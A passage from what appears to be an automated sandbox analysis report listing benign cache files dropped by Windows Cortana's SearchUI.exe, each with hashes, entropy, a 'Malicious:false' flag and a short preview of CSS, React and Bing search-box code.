                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):77082
                      Entropy (8bit):5.207037605863821
                      Encrypted:false
                      SSDEEP:384:B7Nyr2SeGdDzVOwFsOB1ZgM53klAq00EWvsECx0enIh1r7UHcPhQ5nNCKq8YEc6U:B7Ny5fdDzVzOOWuxPqenQ8HcP8YErU
                      MD5:AD12D7C406E186693A63B33914AF8D24
                      SHA1:8BAF278FA18C56ABB58F1157F62C2426B74A974A
                      SHA-256:2502BCF391A30EAE74D4C14C9BBAD818474B066F58D88EB894E3C537A037B3D0
                      SHA-512:A2337F81DF82481B6D57355A7973B266996E92840967CB063096D94B36EBA87B7380C833E8EE8F9C71FD20C2230870002A91C06E49E5D667219BAFCC59A031E2
                      Malicious:false
                      Reputation:low
                      Preview: .rewardsBadge,.wideByDefault .scopesList .scopeTile:not(.selectedScope){color:rgba(0,0,0,.6)}.wideByDefault .scopesList .scopeTile:not(.selectedScope):hover{color:#000}.filterIcon:focus{height:48px;width:46px}body[dir] .filterIcon:focus{margin-top:2px}body[dir='ltr'] .filterIcon:focus{margin-right:2px}body[dir='rtl'] .filterIcon:focus{margin-left:2px}.searchScopes .scopeTile{cursor:default;position:relative;align-items:center}.searchScopes a:hover{background-color:rgba(0,0,0,.1)}.scopesList{height:52px;border-bottom:1px solid rgba(0,0,0,.1);display:flex}.scopesList .scopeTile:focus{height:48px}body[dir] .scopesList .scopeTile:focus{padding:0 14px;margin:2px 2px 0}.scopesList .scopeTile,.scopesList .scopeTile:active{height:51px;display:flex}body[dir] .scopesList .scopeTile,body[dir] .scopesList .scopeTile:active{padding:0 16px;margin:0}.scopesList .scopeTile.selectedScope:focus{height:48px}.scopesList .scopeTile.selectedScope,.scopesList .scopeTile.selectedScope:active{height:52px}.scop
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\BBDBvk5AokRBwrox4FNOb3dTd1E[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):7671
                      Entropy (8bit):5.15245035345059
                      Encrypted:false
                      SSDEEP:192:UADGOuMWZEWjhd7FeyLCL6p7tkJ/srOk3aG3ek1EWTnl/kv9:UuJGcMJfLO
                      MD5:A1F32F25C7C924B918EA54A86670D731
                      SHA1:F1BF7CB5ADDF0C4BCED58D661137A1F0ACD257C5
                      SHA-256:6B58339F9240E372FA046E985DA0D0C5A17B679F27FF3058D6EBD4CD515CA874
                      SHA-512:5ACEFCAB3062051BD538CCF57EBCBB0BC9FCF11C12768EC7559B2ADA84F871299CE2C93B2400807F362578AD2C0F31AFF5CFE925C2FB259A7FFD24CC498435ED
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: body #fbpgdg{color:#000;font-family:'Segoe UI',Arial,Helvetica,Sans-Serif;font-style:normal;font-variant:normal;font-weight:normal;background-position:inherit;display:initial;cursor:pointer;line-height:15px}body{position:static}body[dir]{margin:0}#fbpgdg,#fbpgdg *{box-sizing:content-box}#fbpgdg h2{font-weight:bold;-webkit-margin-before:.83em;-webkit-margin-after:.83em;font-size:1.3em;line-height:15px}body[dir] #fbpgdg h2{margin:10px 0 10px 0}#fbpgdg h3{font-weight:bold;font-size:1.17em;display:block}#fbpgdg .fb-t-small{font-size:13px}#fbpgdg .fbctgcntsdk,#fbpgdg .container{-webkit-margin-after:0}body[dir] #fbpgdg .fbctgcntsdk,body[dir] #fbpgdg .container{margin-bottom:0;margin-top:10px}body[dir='ltr'] #fbpgdg .fbctgcntsdk,body[dir='ltr'] #fbpgdg .container{padding-left:0}body[dir='rtl'] #fbpgdg .fbctgcntsdk,body[dir='rtl'] #fbpgdg .container{padding-right:0}#fbpgdg .fbctgctlsdk{list-style:none;display:list-item}body[dir] #fbpgdg .fbctgctlsdk{margin:10px 0 10px 0}#fbpgdg a{text-decorati
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\BQR--Mi6Hdug9aUgfjMzORag63E.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):15771
                      Entropy (8bit):5.09526529579509
                      Encrypted:false
                      SSDEEP:192:J/MS4lVzgNo0Hb0FAuV++JmzlqZ6GLIV87GI9BgJSY6+lzmu2Bp2aQbwyPcvsyDQ:V4mo07kV7JZ6GLIK7GfVp2Hpykvswb8
                      MD5:E515E69B21C49A355D5D4B91764ABE00
                      SHA1:7571F85095E21BA061631D8A38D18623BCABF301
                      SHA-256:365F8B7A23865CA36D1C1F7A25553AFDDB6223FF524B56D4BEB80FDD98C8E057
                      SHA-512:AA38791CE4ED4039A6D63CF6273BE8CA0DDE2436B8C6E0451937A85652D1C6EA22F38DA9FD81BA9A4E877861B507603C88CACBBFFE4E6B30EC602396F2B87A81
                      Malicious:false
                      Preview: var WSB;(function(n){n.TopLevelDomains={aaa:1,aarp:1,abarth:1,abb:1,abbott:1,abbvie:1,abc:1,able:1,abogado:1,abudhabi:1,ac:1,academy:1,accenture:1,accountant:1,accountants:1,aco:1,actor:1,ad:1,adac:1,ads:1,adult:1,ae:1,aeg:1,aero:1,aetna:1,af:1,afamilycompany:1,afl:1,africa:1,ag:1,agakhan:1,agency:1,ai:1,aig:1,aigo:1,airbus:1,airforce:1,airtel:1,akdn:1,al:1,alfaromeo:1,alibaba:1,alipay:1,allfinanz:1,allstate:1,ally:1,alsace:1,alstom:1,am:1,amazon:1,americanexpress:1,americanfamily:1,amex:1,amfam:1,amica:1,amsterdam:1,analytics:1,android:1,anquan:1,anz:1,ao:1,aol:1,apartments:1,app:1,apple:1,aq:1,aquarelle:1,ar:1,arab:1,aramco:1,archi:1,army:1,arpa:1,art:1,arte:1,as:1,asda:1,asia:1,associates:1,at:1,athleta:1,attorney:1,au:1,auction:1,audi:1,audible:1,audio:1,auspost:1,author:1,auto:1,autos:1,avianca:1,aw:1,aws:1,ax:1,axa:1,az:1,azure:1,ba:1,baby:1,baidu:1,banamex:1,bananarepublic:1,band:1,bank:1,bar:1,barcelona:1,barclaycard:1,barclays:1,barefoot:1,bargains:1,baseball:1,basketball:1,ba
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Dae9F3uWr1j96ciQZxvUiMLiQ20[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):6584
                      Entropy (8bit):5.431678053520003
                      Encrypted:false
                      SSDEEP:192:wESNgDI0VOD4uejPhA/c5jlTULbhCtE+h:fnb9ThtEe
                      MD5:BD7AE7C3176D8081B60F1107A59E2E0A
                      SHA1:0DA7BD177B96AF58FDE9C890671BD488C2E2436D
                      SHA-256:69A4F680A4A443E28D84769ABBBCDC1A64F24117E2B477B49DF0E6CFD5A83FCC
                      SHA-512:0145288AB1C74C45790C7ABCA7B0AA6A0E8C09AB05FC5B9A0AB858BE1B6E302F043EE5DA81C57158BE48A1700D63E9567C8D5DD56ED021508622F81A1D99D168
                      Malicious:false
                      Preview: /** @license React v16.1.1.. * react.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */..'use strict';(function(p,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l():"function"===typeof define&&define.amd?define(l):p.React=l()})(this,function(){function p(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,e=0;e<b;e++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[e+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function l(a){return function(){return a}}function n(a,b,c){this.props=a;this.context=b;this.refs=v;this.updater=c||w}function x(a,b,c){this.props=a;this.context=b;this.refs=
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\DuMT0g46t3Uc7KlS-OCMEDPoXyg[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):1629921
                      Entropy (8bit):6.269910493841166
                      Encrypted:false
                      SSDEEP:24576:8PEw1lQTjvUe7u9D6+zZpP+vkn8OgVsJbTDXFW:iEwLQTjvUe7u9DTzH+vk4gbTDXFW
                      MD5:4800D0FDD008BCE6FB94B4C6CE63EAEB
                      SHA1:8CC560FB1ACC60B82A9075DE8D20B8291881521E
                      SHA-256:CC1B212DAA5BE4CFC7CA7BA3FF59F67919AA7C921CE406A5A2D42BCA97B3EA40
                      SHA-512:2E668EA89C8F8BD15F0418EFE698F2EE49C16C61CF145EAB1978FDE94873E70DF28322172D2FE576514AF822193FE7155E209170FA247D3D1E16752F20B0A055
                      Malicious:false
                      Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"WsbLocStrings",namespace:"WindowsSearchBox"},{AadAccount:t[0],AcceptButtonOK:t[1],AcknowledgeFlyoutText:t[2],ActionsSection:t[3],AddAadAccount:t[4],AddingScopeNarratorText:t[5],AddingScopeNarratorTextAll2:t[6],AddMicrosoftAccount:t[7],Album:t[8],App:t[9],Artist:t[10],Author:t[11],AvailableAccounts:t[12],BestMatch:t[13],BestMatchFor:t[14],BingImageAPIError:t[15],BingImageLeftCarousel:t[16],BingImageOfDay:t[17],BingImageRightCarousel:t[18],Build:t[19],Cancel:t[20],Clear:t[21],CloudSearch:t[22],CommandGroup:t[23],Company:t[24],ConnectedAccount:t[25],ConnectedAccounts:t[26],ContactGroup:t[27],Content:t[28],ContextMenu:t[29],ControlPanelAnnotation:t[30],CopyDetails:t[31],CopyFullPath:t[32],CortanaAnnotation_Email:t[33],CortanaGroup:t[34],CustomizeSearchHome:t[35],DesktopAppAnnotation:t[36],DirectNavSuggestion:t[37],DismissBingImage:t[38],DismissFlyout:t[39],DismissUpsell:t[40],EdgeUpsellButtonMessage:t[41],Ed
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\HkpLvsXkCMkluzD--i9_Hl9v67o[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):94820
                      Entropy (8bit):5.395085534401416
                      Encrypted:false
                      SSDEEP:1536:pSiK8U0NfNWx/mrV+vR1f1fyaSDUQsdObzFcFFUHZy:FV+rf1DQdRcDqy
                      MD5:95029A2B8ED04C57F44599682E9CE9C6
                      SHA1:1E4A4BBEC5E408C925BB30FEFA2F7F1E5F6FEBBA
                      SHA-256:15EDF8C630F285A9B9D9033D867F4FB1D5288AD3BE707F31FB3BF7EDFA54EAEA
                      SHA-512:3C1F3EAA0E2D26D8CF854714E4BA4AF36B102D7AA8CE4138734406BABCD54DC3002EE31A3540009EA7E2C8C8DC3C8CB2CE6E753F410E6C3A0EF055A1E362A608
                      Malicious:false
                      Preview: /** @license React v16.1.1.. * react-dom.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */../*.. Modernizr 3.0.0pre (Custom Build) | MIT..*/..'use strict';(function(ea,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l(require("react")):"function"===typeof define&&define.amd?define(["react"],l):ea.ReactDOM=l(ea.React)})(this,function(ea){function l(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,d=0;d<b;d++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[d+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function oa(a,b){return(a&b)===b}function Qc(a,b){if(Rc.hasOwnProperty(a)||2<a.
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Icb6UCeA0jjc7b0P0da2Jax9Xyw.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):58510
                      Entropy (8bit):5.423191599446094
                      Encrypted:false
                      SSDEEP:1536:UpvOFMkemvRKLVGJknUYv2qaNAhLnadaZBI3vJGsn89+B:UdOF8nUFV8E
                      MD5:15CEE24266CD6FF1C4DB782AE2E1DEA9
                      SHA1:D5F16B4538B5651B04053B0F36C63E7F7BF837DA
                      SHA-256:C06A74F7D319725CC5DE5AD6A5C5268F106A3557209479C57EA24F416A4918A3
                      SHA-512:66485B4EAA5F577E410614C18F9CEAEB5342F3F855B14035CE0831D8505D62E8A40A854676F27145643C78A19AE776850CD921A9DA29ACB90E22F33F04C4DA29
                      Malicious:false
                      Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){var i="NT",p="NF",t="https://substrate.office.com{0}/api/v1/",w=t+"events",o=t+"init",b=t+"suggestions?query=",k=t+"query",d=t+"recommendations",s="SubstrateSearchService",g="https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{0}?Protocol={1}",r="AutoDiscoveryKey",h="gwsflt.",nt="textdecorations",c="scenario",tt="setflight",it="debug",l="entitytypes",rt="1",ut="scopes",ft="people.directorysearch",et="Authorization",f="Content-Type",ot="X-AnchorMailbox",st="X-Client-Language",ht="X-Client-LocalTime",a="Client-Request-Id",v="User-Agent",ct="X-Debug-ExternalExp",lt="X-Client-Flights"
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\Init[1].htm
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                      Category:dropped
                      Size (bytes):323384
                      Entropy (8bit):5.926733097648016
                      Encrypted:false
                      SSDEEP:6144:qpHTE7ummQ+pF6L1DDdsWUzchrtOfAZbDA8as:fum3pZhUzK0ibJas
                      MD5:C0C6B006DA48ED7B9965BC20353E85B4
                      SHA1:5D857576980AD30F9BDFEC767BDE1CE2A6699386
                      SHA-256:21348CE3BF312416465B407356D1A2B81A9A8208ED7218366101AEE024B708F6
                      SHA-512:03C462F998470E1A9544DF90BE47E96A82A74E4442BDBC801E7AE3A2F02CB42644E1DC6CDD70DBA49F8F4BE8F92189A941C2AA2919EE631E1EF343E0672C7F0D
                      Malicious:false
                      Preview: <!DOCTYPE html><html dir="ltr" lang="de" xml:lang="de" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/" manifest="/manifest/threshold.appcache"><script type="text/javascript" >//<![CDATA[..si_ST=new Date..// </script><head> pc--><title>Bing</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><meta name="viewport" content="width=device-width, user-scalable=no" /><script type="text/javascript">//<![CDATA[._G={Region:"CH",Lang:"de-DE",ST:(typeof si_ST!=='undefined'?si_ST:new Date),Mkt:"de-DE",RevIpCC:"ch",RTL:false,Ver:"02",IG:"A8EBC3B4C5CF408B97A29488BB4005C3",EventID:"BA8AD26444044FF1B9D9CF84BC2F0BCA",V:"web",P:"autosuggest",DA:"DUB02",SUIH:"UvMPE5IPIIhvQBA5z_wDew",adc:"b_ad",gpUrl:"\/fd\/ls\/GLinkPing.aspx?" }; _G.lsUrl="/fd/ls/l?IG="+_G.IG ;curUrl="https:\/\/www.bing.com\/AS\/API\/WindowsCortanaPane\/V2\/Init";_G.XLS="\/threshold\/xls.aspx";;_G.nclid='E2F7A83DC9B94278F5D545131FB40E51';var logMetaError=function(n){(new Image).sr
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\J2ICnXp7GMPdq7wY6PnNtCSY5vE.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):62538
                      Entropy (8bit):5.162532697272359
                      Encrypted:false
                      SSDEEP:768:gduBggnd/KAcLY7E++ZcHZUQ5j/p0AL/uTYMHJo1TeOUXh1x/g7Zg+G9QgzyHM:gzZKZhMyT+XEG9Pzys
                      MD5:2CA46CFFB3D3E4867A4E8A8231850069
                      SHA1:23C600F9AEE7F2E1438873EA0167E56E36AC80A3
                      SHA-256:B1597FC6B6FCD43C22BB82791242484A5D08221AA89342207A759CC5756F9CE6
                      SHA-512:E6ED31F0C9BA8AE6391FD6E9948E7797CE86BC2313B1A5D576D0C27901D6D87D827BBACD5CB902D671AD54EE295F9B78BFF3725E8E0E4B644D4E3BF85D660101
                      Malicious:false
                      Preview: var __assign,__extends,__spreadArrays,WSB;(function(n){var t;(function(n){function t(){for(var t,r,u,n,f,e=[],i=0;i<arguments.length;i++)e[i]=arguments[i];for(t=[],r=0,u=e;r<u.length;r++)if(n=u[r],n)if(typeof n=="string")t.push(n);else for(f in n)n[f]&&t.push(f);return t.length>0?t.join(" "):null}function i(n){return ThresholdUtilities.getUrlParameter(location.search,"isTest")?n:undefined}n.ViewData={};n.classNames=t;n.whenTestHooks=i})(t=n.View||(n.View={}))})(WSB||(WSB={}));__extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),function(n){var t;(function(n){var t=function(n){function t(){return n!==null&&n.apply(this,arguments)||this}return __extends(t,n),t.prototype.componentDidMo
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\KDRu5rg-u7qGr4nBIMZzQly6R_0.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):2294
                      Entropy (8bit):4.994755284370797
                      Encrypted:false
                      SSDEEP:48:uj4b+YGuvVADSRR4J1UjQkWWWtJt0RE5hTL4JXhXjMpXvXYk:UJmvuDevWgggh45/Yk
                      MD5:A5CC9DCC23B92296E3BA09D1640698AA
                      SHA1:5E2107B6B9CA65968025B1BE9A2D44D779145A38
                      SHA-256:21EF4AB9E3E454978FA76AF95DC27FD10752F54DD4E9F1B576B6DE7CC2F856DC
                      SHA-512:AB226B03A1681453264F366966F9CCAC45F621B6A6E23194B23ED803177A68923DAA441F6C154F74FCAD4F9A047A7AFCBB0CB65CA45A1CB5B8713C250D2E13B4
                      Malicious:false
                      Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),WSB;(function(n){var t;(function(t){var i=function(i){function r(){return i!==null&&i.apply(this,arguments)||this}return __extends(r,i),r.prototype.render=function(){var r=this.props,i=r.suggestion,f=r.clickHandler,e=r.contextMenuHandler,u;return i?(u=t.classNames("suggestion",{sa_hv:i.selected&&!i.selectedStyleSuspended,selectable:!!i.click},i.classNames.join(" ")),React.createElement("div",{className:"upsellSuggestion"},React.createElement("li",{className:u,onContextMenu:function(n){return e(i,n.nativeEvent)},onClick:function(n){return f(i,n.nativeEvent)},id:i.id,"data-partnertag":t.whenTestHooks("AutoSuggest.RegularSuggesti
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\KzBYfgPMceHbs4NiWkwYLok4Avs.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):61793
                      Entropy (8bit):5.208365454293023
                      Encrypted:false
                      SSDEEP:1536:6NK8rSkBl5VoGDskZDWrT11qscjLkZLWJ/4+wVNe0WkFTaJeDRWG9ZYgn1D4n8z:aK8rZkK54+nE1WG9ZYwz
                      MD5:2409843C998578D89079D89499F35058
                      SHA1:F6CEB468379A4F5C800317D1A8CD5D534C70F9B1
                      SHA-256:B15CDB95909C50CB015F402B171BBD8DE4CAFDD30E3D8A567E2FA27AC37D18CB
                      SHA-512:D9C2B8CF9939B893B3552D4DB1063795A0999039E53C70F2877388FA9BA94B99057B035F2714F9CFD7B464031B6B23779061ACB40C12EF324B116B8502C02682
                      Malicious:false
                      Preview: var WSB;(function(n){function tr(n,i){var r=[],u,f;if(i)if(n)r=i.slice();else{u=function(n){var t=i.find(function(t){return t.verb&&t.verb.toLocaleLowerCase()==n.toLocaleLowerCase()});t&&r.push(t)};for(f in t)u(f)}return r}function ir(n){return n?n.filter(function(n){return!n.verb||n.verb.toLowerCase()!="open"}):[]}function f(t,i,r,u,f,e){e()&&(t=t.slice(),i.getExtraVerbsAsync?n.Promise.safeChain("getExtraVerbsAsync",function(){return i.getExtraVerbsAsync(u)},function(n){return h(k(t,n,!0),i,u,f,e)},function(){return h(t,i,u,f,e)},null,r):h(t,i,u,f,e))}function h(n,t,i,r,u){if(u()){var f=t.getExtraVerbs?k(n,t.getExtraVerbs(i),!1):n;f[0]==v&&f.shift();r(f)}}function rr(i,r,u,f,e){return i.map(function(i){var o,s,h,c;if(i.verb){switch(i.verb.toLocaleLowerCase()){case yt:o="PinnedToStart";break;case w:o="PinnedToTaskbar";break;case pt:o="UnpinnedFromStart";break;case b:o="UnpinnedFromTaskbar";break;case vt:s="UninstallConfirmation";o="UninstallationInProgress"}return h=function(t){t();n.R
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\MAi8ZrMgFhG81tZ07Arc2JEjTY8.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:UTF-8 Unicode text, with very long lines
                      Category:dropped
                      Size (bytes):121212
                      Entropy (8bit):5.344643522973541
                      Encrypted:false
                      SSDEEP:1536:ESf3xYtOXu2ty+gtaZ2GSqKndpOgVnCBO1cChj1L3y99LS:E8x9XuUtgtaZ2pn/OO1Um
                      MD5:2672A6253AB5F7C90F6E240A39FD777A
                      SHA1:B5163F2CB4498C82421D53B7F48905BDAD5F0F9A
                      SHA-256:512350055C0ED6D4E35E726648653FAD41DEEEC3D98194947948B7307FC0CFBB
                      SHA-512:EC012932EF31BB57991B69E0C021781B57BA349771C737CF5EBAE925C246A4910D06581DC286C1D366D0F10EC9CE76E8A6DFCF86DEB1C0EE73F879C26ADBA7E9
                      Malicious:false
                      Preview: /*!. * This file is based on or incorporates material from the projects listed . * below (collectively, Third Party Code). Microsoft is not the original author. * of the Third Party Code. The original copyright notice and the license under. * which Microsoft received such Third Party Code, are set forth below. Such. * licenses and notices are provided for informational purposes only. Microsoft. * licenses the Third Party Code to you under the terms set forth in the EULA. * for the Microsoft Product. Microsoft reserves all other rights not expressly. * granted under this agreement, whether by implication, estoppel or otherwise. . * . * React v0.13.3. *. * Copyright 2013-2015, Facebook, Inc.. * All rights reserved.. *. * This source code is licensed under the BSD-style license found in the. * LICENSE file in the root directory of this source tree. An additional grant. * of patent rights can be found in the PATENTS file in the same directory.. *. */.!function(n){if("object"==typeof export
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\N7CkZwDnglE0ohhGTecIK8uW1Yg.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:exported SGML document, UTF-8 Unicode text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):205394
                      Entropy (8bit):5.316121311921703
                      Encrypted:false
                      SSDEEP:3072:drS49xxDxpFEVP8wGNjr9247Sn+LD/ZJayKQ/DNlybrSdOxmBDmB4I:5S49x9Sl+BmbrSdAmBDmB4I
                      MD5:58E42C78BF715A4F9D3FBEBB70C80145
                      SHA1:4A091565B47C3946763BEFFC3677C15B94DEF436
                      SHA-256:7D9600997E01D7B3E5AF7FE2419FBBC34BF0609A8DD4592BE663D202215DAF56
                      SHA-512:24884F6D8FF201AB2C648DEFFC8D8302252FDFB0CDC725185E3E4BD9095DD25331883BEC1BA0F172BC7D98FBD9F95B04061336933D9B931B6699817EBA82D68A
                      Malicious:false
                      Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){function f(t,r,u,f,e,o,s,h){i(t,r,u,function(t){var i=null;t.status==200&&(i=t.responseText?n.safeExecute(function(){return JSON.parse(t.responseText)},"JSON.parse"):{success:!0});f(i)},e,o,s,h)}function i(i,r,u,f,e,o,s,h,c){var l=c&&_w.XMLHttpRequest?new XMLHttpRequest:sj_gx(),v,a;try{l.open(u?"POST":"GET",i,!0)}catch(y){SharedLogHelper.LogError("fetchUrl",i,y);f&&f({responseText:"",contentType:"",status:-1,result:3});return}if(r)for(v in r)l.setRequestHeader(v,r[v]);e&&(a=e.register(function(){return l.abort()},!1,"xhr abort"));n.config.useEventListeners?(l.addEventListener("load",function(){t
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):6
                      Entropy (8bit):2.584962500721156
                      Encrypted:false
                      SSDEEP:3:jUYn:jBn
                      MD5:77373397A17BD1987DFCA2E68D022ECF
                      SHA1:1294758879506EFF3A54AAC8D2B59DF17B831978
                      SHA-256:A319AF2E953E7AFDA681B85A62F629A5C37344AF47D2FCD23AB45E1D99497F13
                      SHA-512:A177F5C25182C62211891786A8F78B2A1CAEC078C512FC39600809C22B41477C1E8B7A3CF90C88BBBE6869EA5411DD1343CAD9A23C6CE1502C439A6D1779EA1B
                      Malicious:false
                      Preview: z{a:1}
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\E1N0ES4F\6\TJkyBfZhNVw9l2HAW3TbsZKbNwc.br[1].js
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:ASCII text, with very long lines, with CRLF line terminators
                      Category:dropped
                      Size (bytes):17560
                      Entropy (8bit):5.4266165365013235
                      Encrypted:false
                      SSDEEP:384:iTKwROpIbfMP+t4JdQFBfMlArU/HW8o/Z0Co/lo1LqEzubSfpj:wKwnfMP+EdQFBfMiA/2jR0n6wuj
                      MD5:C8BE2C675D49A0D03AB4965A3AD5E9EF
                      SHA1:500ADA3E4B4A975D296D2049D53BBE7095F6FA77
                      SHA-256:DEBEDE07EF020FEFCA20294F5C16FA8D5FCDEC4DE0355BCA446F3B93D219B687
